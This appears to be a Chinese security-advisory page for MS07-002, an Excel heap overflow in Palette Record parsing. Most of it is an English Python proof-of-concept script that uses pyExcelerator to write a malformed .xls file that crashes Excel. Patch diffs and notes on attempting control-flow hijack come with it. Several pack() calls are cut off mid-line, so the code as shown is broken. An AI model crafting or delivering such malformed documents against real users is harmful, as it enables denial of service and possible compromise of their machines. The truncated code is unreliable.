Excel处理Opcode的方式存在漏洞,远程攻击者可能利用此漏洞控制用户机器。
攻击者可以通过诱骗用户打开包含Opcode的Excel文档来利用此漏洞,如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
```
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
###### Author ######
LifeAsaGeek at gmail.com ... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs
########################
VulMS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
######
Author
######
LifeAsaGeek at gmail.com
... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs
########################
Vulnerablity Description
########################
Bound error occurs when parsing Palette Record and it causes Heap Overflow
check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506
which is generated by DarunGrim
( and I want to say I'm not a person who made this analyzer ==; )
#############
Attack Vector
#############
Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !
Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )
In *CERTAIN* environment( such as open excel file which is already opened)
you can catch the flow by modify function pointer, but it doesn't have a reliablity at all
Let me know if you have a good method to break down
######
Result
######
DOS
#####
Notes
#####
You should modify pyExcelerator module because it doesn't generate Palette Record
pyExcelerator diff results would be like below
diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py
1104a1105,1108
> def __init__(self):
> BiffRecord.__init__(self)
> self._rec_data = pack('
> self._rec_data = 'A' * 0xe0
diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py
468,469c468
< result = ''
< return result
---
> return BIFFRecords.PaletteRecord().get()
!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!
- 2007.01.25
"""
import sys, os
from struct import *
from pyExcelerator import *
def CreateXLS():
w = Workbook()
ws = w.add_sheet('MS07-002 POC')
w.save( "before.xls")
def ModifyXLS():
try:
f = open( "before.xls", "rb")
except:
print "File Open Error ! "
sys.exit(0)
str = f.read()
f.close()
#write to malformed xls file
f = open( "after.xls", "wb")
PaletteRecord = pack( "
NewPaletteRecord = pack( "
palette_idx = str.find( PaletteRecord)
if palette_idx == -1:
print "Cannot find Palette Record"
sys.exit(0)
str = str.replace( PaletteRecord, NewPaletteRecord)
f.write( str)
f.close()
if __name__ == "__main__":
print "==========================================================="
print "MS07-002 Malformed Palette Record vulnerability DOS POC "
print "Create POC Excel File after.xls"
print "by LifeAsaGeek at gmail.com"
print "==========================================================="
CreateXLS()
ModifyXLS()
```
京公网安备 11010502034610号
暂无评论